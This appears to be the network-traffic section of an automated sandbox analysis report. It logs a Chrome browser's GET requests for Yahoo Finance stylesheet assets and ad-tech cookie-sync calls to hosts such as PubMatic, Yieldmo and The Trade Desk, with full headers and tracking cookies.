Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/SectionWithSidebar.Bf-AwOOu.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /s/dcm?pid=4bd6ceca-c698-4782-a536-f380f757484c&id=176682A8-E121-44A7-818D-4FE53D542BB2&redir=true&gdpr=0&gdpr_consent=&dcc=t HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-privacy=0; ad-id=A3cS_gqdeUbvqw-b1fKqWAc|t
Source: global trafficHTTP traffic detected: GET /sync?pn_id=rc&id=M1PA0VVQ-I-EWH1 HTTP/1.1Host: ads.yieldmo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yieldmo_id=VRLAoLL__uL1ewyIa5Iq%7C1727654400000%7C0; re_sync=rc%3D1200643%7Cunl%3D1200643%7Ct%3D1200643%7Cpub%3D1200643%7Can%3D1200643; ptran=7992184014990425658
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/LeafNewsStream.D-zPoQeW.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /cr?key=pubmatic&gdpr=0&gdpr_consent=&bounce=1&random=2551201198 HTTP/1.1Host: cr.frontend.weborama.frConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AFFICHE_W=h3WN35HLk9WH59
Source: global trafficHTTP traffic detected: GET /pubmatic/1/info?sType=sync&sExtCookieId=176682A8-E121-44A7-818D-4FE53D542BB2&sInitiator=external&gdpr=0&gdpr_consent= HTTP/1.1Host: uipus.semasio.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: SEUNCY=8B22F39EC31AE5F8
Source: global trafficHTTP traffic detected: GET /ebda?gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=3811239664715375770435; tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/FilteredStories.C5ltb4Tz.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM0MjImdGw9MTI5NjAw&gdpr=0&gdpr_consent= HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; KTPCACOOKIE=YES; chkChromeAb67Sec=2; DPSync4=1728864000%3A227_226_219_197_245_241; SyncRTB4=1728259200%3A223%7C1728864000%3A220_201_13_251_54_71_3_21_56_266; ipc=160648^https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT^2^0; pi=160648:3
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=pubmatic&ttd_tpi=1&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=07c89b85-4c1c-424d-8df0-0123ed6cebb6; TDCPM=CAESFgoHc3Z4OXQ1MBILCOb3lfnK37A9EAUYBSACKAIyCwiYwNik4d-wPRAFOAE.
Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTIxNzcmdGw9MTI5NjAw&gdpr=0&gdpr_consent=&piggybackCookie=CAESEH85Z0C6pHtyE6-DEC6SiYM&google_cver=1 HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; KTPCACOOKIE=YES; chkChromeAb67Sec=2; DPSync4=1728864000%3A227_226_219_197_245_241; SyncRTB4=1728259200%3A223%7C1728864000%3A220_201_13_251_54_71_3_21_56_266; ipc=160648^https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT^2^0; pi=160648:3
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/StoryItem.CsmwoRFQ.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/StoryMetaPublishing.uqjoCQC9.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /cm-notify?pi=pubmatic&gdpr=-1&gdpr_consent= HTTP/1.1Host: creativecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /qmap?c=240&tp=PUBM&tpid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=&ct=y HTTP/1.1Host: sync.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cc_cc=ctst
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Ticker.BZjnd4DS.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/TopicPill.Cd876vvj.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /sync/pubmatic/176682A8-E121-44A7-818D-4FE53D542BB2?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /sync?ssp=gumgum2&user_id=e_5a867c78-d90d-4df8-b8ff-e041d0dc2e22&gdpr=0&gdpr_consent=&us_privacy=1YNN HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rtb.gumgum.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /csync/RX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003?redir=https%3A%2F%2Fads.yieldmo.com%2Fv000%2Fsync%3Fpn_id%3Dunl%26id%3DRX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003 HTTP/1.1Host: sync.targeting.unrulymedia.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
